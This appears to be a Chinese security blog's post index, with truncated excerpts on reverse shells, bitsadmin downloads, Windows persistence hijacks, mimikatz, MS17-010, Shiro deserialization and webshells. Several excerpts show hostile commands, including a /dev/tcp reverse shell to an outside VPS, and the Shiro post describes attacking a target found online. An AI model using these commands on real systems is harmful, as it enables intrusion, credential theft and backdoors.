原创 wordpress在線檢測主題和插件

http://wpthemedetector.coderschool.cn/ http://www.wpthemedetector.com/ http://whatwpthemeisthat.com http://whattheme.co

原创 使用digispark製作一個BadUSB

0X00、工具準備 digispark開發板。 淘寶連接:https://m.tb.cn/h.VK7vwjy?sm=d85844 0X01、安裝Arduino IDE環境 1、安裝 arduino 的 IDE。       下載地址:

原创 bitsadmin windwos自帶下載命令

bitsadmin的四種下載文件的方法 一、 bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt 二、 bitsadmin /rawr

原创 各種環境下反彈shell

0x00 NC命令詳解 在介紹如何反彈shell之前,先了解相關知識要點。 nc全稱爲netcat,所做的就是在兩臺電腦之間建立鏈接,並返回兩個數據流 可運行在TCP或者UDP模式,添加參數 —u 則調整爲udP,默認爲tcp,詳細參數如

原创 端口轉發工具--lcx

簡介     lcx是一款強大的內網端口轉發工具,用於將內網主機開放的內部端口映射到外網主機(有公網IP)任意端口。它是一款命令行工具,當然也可以在有權限的webshell下執行,正因如此lcx常被認爲是一款黑客入侵工具,lcx在內網入侵

原创 後門及持久化訪問3----進程注入之AppInit_DLLs註冊表項

進程注入之AppInit_DLLs註冊表項 User32.dll被加載到進程時,會獲取AppInit_DLLs註冊表項,若有值,則調用LoadLibrary() API加載用戶DLL。只會影響加載了user32.dll的進程。 HKEY

原创 後門及持久化訪問1----輔助功能鏡像劫持

代碼及原理介紹     爲了使電腦更易於使用和訪問,Windows添加了一些輔助功能。這些功能可以在用戶登錄之前以組合鍵啓動。根據這個特徵,一些惡意軟件無需登錄到系統,通過遠程桌面協議就可以執行惡意代碼。 一些常見的輔助功能如: C:\W

原创 CVE-2019-0708 RCE復現

漏洞環境 192.168.91.136     windows7 6.1.7601 192.168.91.151      kali Windows7 SP1下載鏈接: ed2k://|file|cn_windows_7_ultimate

原创 後門及持久化訪問4----Com組件劫持

代碼及原理介紹         COM是Component Object Model(組件對象模型)的縮寫,COM組件由DLL和EXE形式發佈的可執行代碼所組成。每個COM組件都有一個CLSID,這個CLSID是註冊的時候寫進註冊表的,可

原创 後門及持久化訪問2----進程注入之AppCertDlls 註冊表項

代碼及原理介紹 如果有進程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec 函數,那麼此進程會獲取HK

原创 meterpreter中使用mimikatz獲取windows密碼

進去meterpreter後getuid一下 這獲得系統管理員權限 開始 加載mimikatz模塊 load mimikatz 加載成功. 第一種方法: 獲取登錄密碼的hash值 msv 上面已經是得到hash值了. 下面算明文

原创 Apache Shiro反序列化遠程代碼執行復現

1、尋找目標 首先FOFA找一個環境,檢測工具檢測一下 發現目標,開幹! 2、開啓監聽 首先在vps運行nc 監聽一個端口 nc -lvp 666 列出需要使用的反彈指令 bash -i >& /dev/tcp/129.204.x

原创 PhpMyadmin後臺拿webshell方法總結

前言: phpmyadmin後臺拿webshell的方法主要分爲兩個方法: (1) 、通過日誌文件拿webshell; (2) 、利用日誌文件寫入一句話;(這個方法可能在實際操作中會遇到困難); 本地搭建環境: Phpmystudy 20

原创 利用公網Msf+MS17010跨網段攻擊內網

其實很多小白在對利用msf進行ms17010攻擊的時候總是不成功,其實這都是因爲網上大部分的文章都是寫的內網對內網(192.168.1.2-->192.168.1.3)這樣的案例,今天寫了一下利用公網的MSF直接攻擊其他服務器內網的案例。

原创 .htaccess文件構成的PHP後門

1、.htaccess文件 2、文件上傳繞過 一般.htaccess可以用來留後門和針對黑名單繞過 創建一個txt寫入(png解析爲php) AddType application/x-httpd-php .png 另存爲.htacc